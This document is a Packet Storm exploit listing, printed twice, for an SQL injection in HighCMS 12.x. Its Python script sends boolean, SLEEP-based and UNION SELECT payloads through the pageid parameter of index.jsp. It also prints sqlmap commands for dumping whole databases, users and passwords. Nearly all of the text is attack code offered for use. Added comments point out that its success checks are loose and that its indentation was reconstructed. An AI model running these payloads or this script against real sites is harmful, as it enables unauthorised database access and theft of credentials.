Description
HighCMS version 12.x remote SQL injection proof of concept exploit written in Python...
Basic Information
ID
PACKETSTORM:212870
Published
Dec 16, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
A critical SQL injection vulnerability exists in HighCMS/HighCMS version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Silence urllib3's InsecureRequestWarning for the whole process. Every request
# in this file passes verify=False, so TLS certificates are never validated and
# this call only removes the warning that would otherwise point that out.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
    """HTTP client for the advisory's ``pageid`` SQL injection proof of concept.

    Every request sent by this class is a GET to
    ``<target>/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=<payload>`` with a
    10 second timeout and TLS certificate verification disabled.

    For detection and log review: the path and parameter order are fixed
    (``siteid`` appears twice, ``fkeyid`` is empty), every probe value for
    ``pageid`` starts with the literal ``6528``, and the request headers are
    a static set defined in ``__init__``.

    NOTE(review): block indentation was lost where this listing was
    published; the nesting below is reconstructed from syntax and should be
    confirmed against the original file.
    """

    def __init__(self, target):
        """Store the base URL and create a session with fixed headers.

        Args:
            target: Base URL of the site; trailing slashes are stripped.
        """
        self.target = target.rstrip('/')
        self.session = requests.Session()
        # Static browser-like header set, reused unchanged for every request
        # made through this session.
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive'
        })

    def check_vulnerability(self):
        """Send up to four probe requests and report whether any check fired.

        Returns:
            True if the time-based, error-string or boolean comparison check
            set the flag; False otherwise.

        NOTE(review): each criterion is loose (response time, generic error
        text, any difference between two page bodies), so a True result is
        an indication to investigate rather than proof of injection.
        """
        print(f"[*] Checking vulnerability for: {self.target}")
        # Probe values for pageid: a boolean true/false pair, a SLEEP(5)
        # delay probe and a five-column UNION SELECT. The f-string below
        # places them in the URL as-is; this code applies no encoding itself.
        test_payloads = [
            "6528' AND '1'='1",
            "6528' AND '1'='2",
            "6528' AND SLEEP(5)--",
            "6528 UNION SELECT 1,2,3,4,5--"
        ]
        vulnerable = False
        for payload in test_payloads:
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                # Time-based check: wall-clock duration of one request.
                if "SLEEP" in payload:
                    import time  # function-scope import; not imported at file level
                    start_time = time.time()
                    response = self.session.get(url, timeout=10, verify=False)
                    end_time = time.time()
                    # Any response taking 5 s or more counts as confirmation.
                    # The measurement includes network and server latency, so
                    # a slow host gives the same result.
                    if end_time - start_time >= 5:
                        print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                        vulnerable = True
                        break
                else:
                    response = self.session.get(url, timeout=10, verify=False)
                    # Error-string check: case-insensitive substring match
                    # against the whole response body. The strings are generic
                    # database/driver error text, so any page that happens to
                    # contain one of them matches as well.
                    error_indicators = [
                        "SQL syntax",
                        "Microsoft OLE DB Provider",
                        "ODBC Driver",
                        "SQLServer",
                        "Unclosed quotation mark",
                        "syntax error"
                    ]
                    for error in error_indicators:
                        if error.lower() in response.text.lower():
                            print(f"[+] Error-based SQL Injection confirmed!")
                            print(f"[+] Payload: {payload}")
                            vulnerable = True
                            # As reconstructed, this leaves only the
                            # indicator loop; later payloads are still sent.
                            break
                    # Boolean check: compare the bodies returned for the
                    # '1'='1 and '1'='2 probes.
                    # true_response / false_response are bound only when the
                    # matching probe returned HTTP 200. If the first probe did
                    # not, the comparison raises NameError, which the broad
                    # except below prints as a payload error.
                    if "'1'='1" in payload and response.status_code == 200:
                        true_response = response.text
                    if "'1'='2" in payload and response.status_code == 200:
                        false_response = response.text
                        # Any difference between the two bodies counts,
                        # including page content unrelated to the query.
                        if true_response != false_response:
                            print(f"[+] Boolean-based SQL Injection confirmed!")
                            vulnerable = True
                            break
            except Exception as e:
                # Broad catch: network failures and programming errors are
                # both printed here and the next payload is tried.
                print(f"[-] Error testing payload {payload}: {e}")
                continue
        return vulnerable

    def exploit_union(self, columns=5):
        """Send UNION SELECT NULL probes for 1..columns columns.

        Args:
            columns: Highest column count to try (default 5).

        Returns:
            True after the first probe judged successful (extract_data is
            called before returning); False if none is.
        """
        print(f"[*] Attempting UNION-based exploitation with {columns} columns")
        # One request per candidate column count, lowest first.
        for col_count in range(1, columns + 1):
            nulls = ','.join(['NULL'] * col_count)
            payload = f"6528 UNION SELECT {nulls}--"
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                response = self.session.get(url, timeout=10, verify=False)
                # "Success" means HTTP 200 and the substring "error" absent
                # from the body (case-insensitive). Query output is not
                # inspected, so any ordinary 200 page without that word
                # satisfies the test.
                if response.status_code == 200 and "error" not in response.text.lower():
                    print(f"[+] UNION injection successful with {col_count} columns")
                    # Follow-up probes; see extract_data for what they do.
                    self.extract_data(col_count)
                    return True
            except Exception as e:
                # Printed and skipped; the loop moves to the next count.
                print(f"[-] Error with {col_count} columns: {e}")
        return False

    def extract_data(self, column_count):
        """Send fixed version/user UNION probes and print status messages.

        Args:
            column_count: Accepted but not used; every payload in this
                method is hard-coded with five columns.

        The response bodies are never read. The "extracted" messages are
        printed on HTTP 200 (version probes) or whenever the request
        completes (user probe), so they do not show that data was returned.
        """
        print("[*] Extracting database information...")
        # The three expressions are version lookups from different database
        # engines; the list does not establish which one the product uses.
        version_payloads = [
            "6528 UNION SELECT 1,@@version,3,4,5--",
            "6528 UNION SELECT 1,version(),3,4,5--",
            "6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
        ]
        for payload in version_payloads:
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                response = self.session.get(url, timeout=10, verify=False)
                if response.status_code == 200:
                    # Only the status code is checked; nothing is parsed
                    # out of response.text.
                    print("[+] Database version information extracted")
                    break
            except:
                # Bare except: swallows every exception, KeyboardInterrupt
                # included, and moves on to the next payload.
                continue
        # Single probe using user(); the result is assigned but not examined.
        user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
        url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
        try:
            response = self.session.get(url, timeout=10, verify=False)
            print("[+] Current user information extracted")
        except:
            # Bare except: failures are silently ignored.
            pass

    def generate_sqlmap_command(self):
        """Print sqlmap command lines for the same URL; sends no requests."""
        # Assigned but never used; only the print() calls below emit output.
        sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
        print("\n[+] SQLMap Commands:")
        print("=" * 50)
        print("# Basic detection:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
        print("\n# Full database dump:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
        print("\n# Get database users:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
        print("\n# Get database passwords:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
    """Parse command-line options and run the selected mode.

    Modes are tested in the order --check, --exploit, --sqlmap; if several
    flags are given, only the first match runs. With no mode flag the check
    runs and follow-up options are printed.
    """
    # Banner text is reproduced exactly as published, including its column-0
    # layout inside the string literal.
    banner = """
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
    print(banner)
    parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
    parser.add_argument('--check', action='store_true', help='Check vulnerability only')
    parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
    parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
    args = parser.parse_args()
    exploit = HighCMSExploit(args.url)
    if args.check:
        # Probe only, then print the verdict.
        if exploit.check_vulnerability():
            print("\n[!] Target is VULNERABLE to SQL Injection")
        else:
            print("\n[!] Target does not appear to be vulnerable")
    elif args.exploit:
        # The UNION stage runs only when the check returned True; a negative
        # check prints nothing further in this mode.
        if exploit.check_vulnerability():
            print("\n[*] Starting exploitation...")
            exploit.exploit_union()
    elif args.sqlmap:
        # Prints command lines only; no requests are sent in this mode.
        exploit.generate_sqlmap_command()
    else:
        # Default: check and provide options
        # The script names in these hints (exploit.py) differ from the
        # advisory's "python poc.py"; the strings are left as published.
        if exploit.check_vulnerability():
            print("\n[+] Vulnerability confirmed!")
            print("\nAvailable options:")
            print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
            print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
        else:
            print("\n[-] Target not vulnerable or not accessible")
# Script entry point. With no command-line arguments, print a short usage hint
# and exit with status 1 before argparse runs; otherwise hand over to main().
if __name__ == "__main__":
    if len(sys.argv) == 1:
        print("Usage: python highcms_exploit.py -u https://target.com")
        print("Options: --check, --exploit, --sqlmap")
        sys.exit(1)
    main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
A critical SQL injection vulnerability exists in HighCMS/HighCMS version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Silence urllib3's InsecureRequestWarning for the whole process. Every request
# in this file passes verify=False, so TLS certificates are never validated and
# this call only removes the warning that would otherwise point that out.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
    """HTTP client for the advisory's ``pageid`` SQL injection proof of concept.

    Every request sent by this class is a GET to
    ``<target>/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=<payload>`` with a
    10 second timeout and TLS certificate verification disabled.

    For detection and log review: the path and parameter order are fixed
    (``siteid`` appears twice, ``fkeyid`` is empty), every probe value for
    ``pageid`` starts with the literal ``6528``, and the request headers are
    a static set defined in ``__init__``.

    NOTE(review): block indentation was lost where this listing was
    published; the nesting below is reconstructed from syntax and should be
    confirmed against the original file.
    """

    def __init__(self, target):
        """Store the base URL and create a session with fixed headers.

        Args:
            target: Base URL of the site; trailing slashes are stripped.
        """
        self.target = target.rstrip('/')
        self.session = requests.Session()
        # Static browser-like header set, reused unchanged for every request
        # made through this session.
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive'
        })

    def check_vulnerability(self):
        """Send up to four probe requests and report whether any check fired.

        Returns:
            True if the time-based, error-string or boolean comparison check
            set the flag; False otherwise.

        NOTE(review): each criterion is loose (response time, generic error
        text, any difference between two page bodies), so a True result is
        an indication to investigate rather than proof of injection.
        """
        print(f"[*] Checking vulnerability for: {self.target}")
        # Probe values for pageid: a boolean true/false pair, a SLEEP(5)
        # delay probe and a five-column UNION SELECT. The f-string below
        # places them in the URL as-is; this code applies no encoding itself.
        test_payloads = [
            "6528' AND '1'='1",
            "6528' AND '1'='2",
            "6528' AND SLEEP(5)--",
            "6528 UNION SELECT 1,2,3,4,5--"
        ]
        vulnerable = False
        for payload in test_payloads:
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                # Time-based check: wall-clock duration of one request.
                if "SLEEP" in payload:
                    import time  # function-scope import; not imported at file level
                    start_time = time.time()
                    response = self.session.get(url, timeout=10, verify=False)
                    end_time = time.time()
                    # Any response taking 5 s or more counts as confirmation.
                    # The measurement includes network and server latency, so
                    # a slow host gives the same result.
                    if end_time - start_time >= 5:
                        print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                        vulnerable = True
                        break
                else:
                    response = self.session.get(url, timeout=10, verify=False)
                    # Error-string check: case-insensitive substring match
                    # against the whole response body. The strings are generic
                    # database/driver error text, so any page that happens to
                    # contain one of them matches as well.
                    error_indicators = [
                        "SQL syntax",
                        "Microsoft OLE DB Provider",
                        "ODBC Driver",
                        "SQLServer",
                        "Unclosed quotation mark",
                        "syntax error"
                    ]
                    for error in error_indicators:
                        if error.lower() in response.text.lower():
                            print(f"[+] Error-based SQL Injection confirmed!")
                            print(f"[+] Payload: {payload}")
                            vulnerable = True
                            # As reconstructed, this leaves only the
                            # indicator loop; later payloads are still sent.
                            break
                    # Boolean check: compare the bodies returned for the
                    # '1'='1 and '1'='2 probes.
                    # true_response / false_response are bound only when the
                    # matching probe returned HTTP 200. If the first probe did
                    # not, the comparison raises NameError, which the broad
                    # except below prints as a payload error.
                    if "'1'='1" in payload and response.status_code == 200:
                        true_response = response.text
                    if "'1'='2" in payload and response.status_code == 200:
                        false_response = response.text
                        # Any difference between the two bodies counts,
                        # including page content unrelated to the query.
                        if true_response != false_response:
                            print(f"[+] Boolean-based SQL Injection confirmed!")
                            vulnerable = True
                            break
            except Exception as e:
                # Broad catch: network failures and programming errors are
                # both printed here and the next payload is tried.
                print(f"[-] Error testing payload {payload}: {e}")
                continue
        return vulnerable

    def exploit_union(self, columns=5):
        """Send UNION SELECT NULL probes for 1..columns columns.

        Args:
            columns: Highest column count to try (default 5).

        Returns:
            True after the first probe judged successful (extract_data is
            called before returning); False if none is.
        """
        print(f"[*] Attempting UNION-based exploitation with {columns} columns")
        # One request per candidate column count, lowest first.
        for col_count in range(1, columns + 1):
            nulls = ','.join(['NULL'] * col_count)
            payload = f"6528 UNION SELECT {nulls}--"
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                response = self.session.get(url, timeout=10, verify=False)
                # "Success" means HTTP 200 and the substring "error" absent
                # from the body (case-insensitive). Query output is not
                # inspected, so any ordinary 200 page without that word
                # satisfies the test.
                if response.status_code == 200 and "error" not in response.text.lower():
                    print(f"[+] UNION injection successful with {col_count} columns")
                    # Follow-up probes; see extract_data for what they do.
                    self.extract_data(col_count)
                    return True
            except Exception as e:
                # Printed and skipped; the loop moves to the next count.
                print(f"[-] Error with {col_count} columns: {e}")
        return False

    def extract_data(self, column_count):
        """Send fixed version/user UNION probes and print status messages.

        Args:
            column_count: Accepted but not used; every payload in this
                method is hard-coded with five columns.

        The response bodies are never read. The "extracted" messages are
        printed on HTTP 200 (version probes) or whenever the request
        completes (user probe), so they do not show that data was returned.
        """
        print("[*] Extracting database information...")
        # The three expressions are version lookups from different database
        # engines; the list does not establish which one the product uses.
        version_payloads = [
            "6528 UNION SELECT 1,@@version,3,4,5--",
            "6528 UNION SELECT 1,version(),3,4,5--",
            "6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
        ]
        for payload in version_payloads:
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                response = self.session.get(url, timeout=10, verify=False)
                if response.status_code == 200:
                    # Only the status code is checked; nothing is parsed
                    # out of response.text.
                    print("[+] Database version information extracted")
                    break
            except:
                # Bare except: swallows every exception, KeyboardInterrupt
                # included, and moves on to the next payload.
                continue
        # Single probe using user(); the result is assigned but not examined.
        user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
        url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
        try:
            response = self.session.get(url, timeout=10, verify=False)
            print("[+] Current user information extracted")
        except:
            # Bare except: failures are silently ignored.
            pass

    def generate_sqlmap_command(self):
        """Print sqlmap command lines for the same URL; sends no requests."""
        # Assigned but never used; only the print() calls below emit output.
        sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
        print("\n[+] SQLMap Commands:")
        print("=" * 50)
        print("# Basic detection:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
        print("\n# Full database dump:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
        print("\n# Get database users:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
        print("\n# Get database passwords:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
    """Parse command-line options and run the selected mode.

    Modes are tested in the order --check, --exploit, --sqlmap; if several
    flags are given, only the first match runs. With no mode flag the check
    runs and follow-up options are printed.
    """
    # Banner text is reproduced exactly as published, including its column-0
    # layout inside the string literal.
    banner = """
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
    print(banner)
    parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
    parser.add_argument('--check', action='store_true', help='Check vulnerability only')
    parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
    parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
    args = parser.parse_args()
    exploit = HighCMSExploit(args.url)
    if args.check:
        # Probe only, then print the verdict.
        if exploit.check_vulnerability():
            print("\n[!] Target is VULNERABLE to SQL Injection")
        else:
            print("\n[!] Target does not appear to be vulnerable")
    elif args.exploit:
        # The UNION stage runs only when the check returned True; a negative
        # check prints nothing further in this mode.
        if exploit.check_vulnerability():
            print("\n[*] Starting exploitation...")
            exploit.exploit_union()
    elif args.sqlmap:
        # Prints command lines only; no requests are sent in this mode.
        exploit.generate_sqlmap_command()
    else:
        # Default: check and provide options
        # The script names in these hints (exploit.py) differ from the
        # advisory's "python poc.py"; the strings are left as published.
        if exploit.check_vulnerability():
            print("\n[+] Vulnerability confirmed!")
            print("\nAvailable options:")
            print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
            print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
        else:
            print("\n[-] Target not vulnerable or not accessible")
# Script entry point. With no command-line arguments, print a short usage hint
# and exit with status 1 before argparse runs; otherwise hand over to main().
if __name__ == "__main__":
    if len(sys.argv) == 1:
        print("Usage: python highcms_exploit.py -u https://target.com")
        print("Options: --check, --exploit, --sqlmap")
        sys.exit(1)
    main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================